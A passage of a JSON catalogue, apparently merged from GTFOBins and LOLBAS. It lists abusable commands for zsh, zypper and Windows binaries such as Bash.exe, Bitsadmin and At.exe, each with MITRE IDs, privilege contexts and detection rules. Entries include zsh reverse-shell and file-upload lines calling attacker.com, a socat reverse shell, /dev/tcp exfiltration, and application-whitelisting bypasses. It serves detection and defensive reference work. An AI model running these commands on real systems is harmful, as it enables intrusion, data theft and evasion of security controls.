'</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-write:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-write:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-write:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:inherit:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:inherit:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:inherit:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:reverse-shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:reverse-shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:reverse-shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:upload:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:upload:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:upload:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsoelim:file-read:0:sudo","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsoelim/"]},{"id":"gtfo:zsoelim:file-read:0:suid","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsoelim/"]},{"id":"gtfo:zsoelim:file-read:0:unprivileged","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsoelim/"]},{"id":"gtfo:zypper:shell:0:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"gtfo:zypper:shell:0:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"gtfo:zypper:shell:1:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"gtfo:zypper:shell:1:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"lolbas:addinutil-exe:0","toolId":"lolbas:addinutil-exe","toolName":"AddinUtil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe -AddinRoot:.","description":"AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload.","usecase":"Proxy execution of malicious serialized payload","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml"}],"references":["https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html","https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"]},{"id":"lolbas:appinstaller-exe:0","toolId":"lolbas:appinstaller-exe","toolName":"AppInstaller.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source={REMOTEURL:.exe}","description":"AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"}],"references":["https://twitter.com/notwhickey/status/1333900137232523264","https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"]},{"id":"lolbas:applaunch-exe:0","toolId":"lolbas:applaunch-exe","toolName":"Applaunch.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe\" /activate \"{REMOTEURL}#APPLICATION_METADATA_HERE\"","description":"Launches a ClickOnce application via `Applaunch.exe`. Bypasses SmartScreen and default AppLocker rules when the application is published as partial trust.","usecase":"Execute ClickOnce applications in environments where `dfsvc.exe` would normally enforce full-trust and SmartScreen checks. Can be abused as an AWL bypass in rare configurations.","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Applaunch.exe rarely executes unless any ClickOnce partial trusted apps are used. Any use or invocation outside dfsvc.exe with `/activate` should be considered suspicious."}],"references":["https://nathan2.com/posts/clicktools","https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment","https://web.archive.org/web/20060913192623/http://blogs.msdn.com/shawnfa/archive/2005/11/30/498610.aspx","https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"]},{"id":"lolbas:aspnet-compiler-exe:0","toolId":"lolbas:aspnet-compiler-exe","toolName":"Aspnet_Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u","description":"Execute C# code with the Build Provider and proper folder structure in place.","usecase":"Execute proxied payload with Microsoft signed binary to bypass application control solutions","mitre":["T1127"],"privilege":"user","fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml"}],"references":["https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/","https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8","https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"]},{"id":"lolbas:at-exe:0","toolId":"lolbas:at-exe","toolName":"At.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\System32\\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}","description":"Create a recurring task to execute every day at a specific time.","usecase":"Create a recurring task, to eg. to keep reverse shell session(s) alive","mitre":["T1053.002"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/builtin/security/win_security_atsvc_task.yml"},{"type":"IOC","value":"C:\\Windows\\System32\\Tasks\\At1 (substitute 1 with subsequent number of at job)"},{"type":"IOC","value":"C:\\Windows\\Tasks\\At1.job"},{"type":"IOC","value":"Registry Key - Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1."}],"references":["https://freddiebarrsmith.com/at.txt","https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html","https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems","https://lolbas-project.github.io/lolbas/Binaries/At/"]},{"id":"lolbas:atbroker-exe:0","toolId":"lolbas:atbroker-exe","toolName":"Atbroker.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ATBroker.exe /start malware","description":"Start a registered Assistive Technology (AT).","usecase":"Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml"},{"type":"IOC","value":"Changes to HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration"},{"type":"IOC","value":"Changes to HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"},{"type":"IOC","value":"Unknown AT starting C:\\Windows\\System32\\ATBroker.exe /start malware"}],"references":["http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/","https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"]},{"id":"lolbas:bash-exe:0","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:1","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane\"","description":"Executes a reverse shell","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:2","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'","description":"Exfiltrate data","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:3","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used to bypass Application Whitelisting.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:4","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe","description":"When executed, `bash.exe` queries the registry value of `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation`, which contains a folder path (`c:\\program files\\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.","usecase":"Execute a payload as a child process of `bash.exe` while masquerading as WSL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bitsadmin-exe:0","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.","usecase":"Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:bitsadmin-exe:1","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\playfolder\\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:bitsadmin-exe:2","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset","description":"Command for copying cmd.exe to another folder","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data 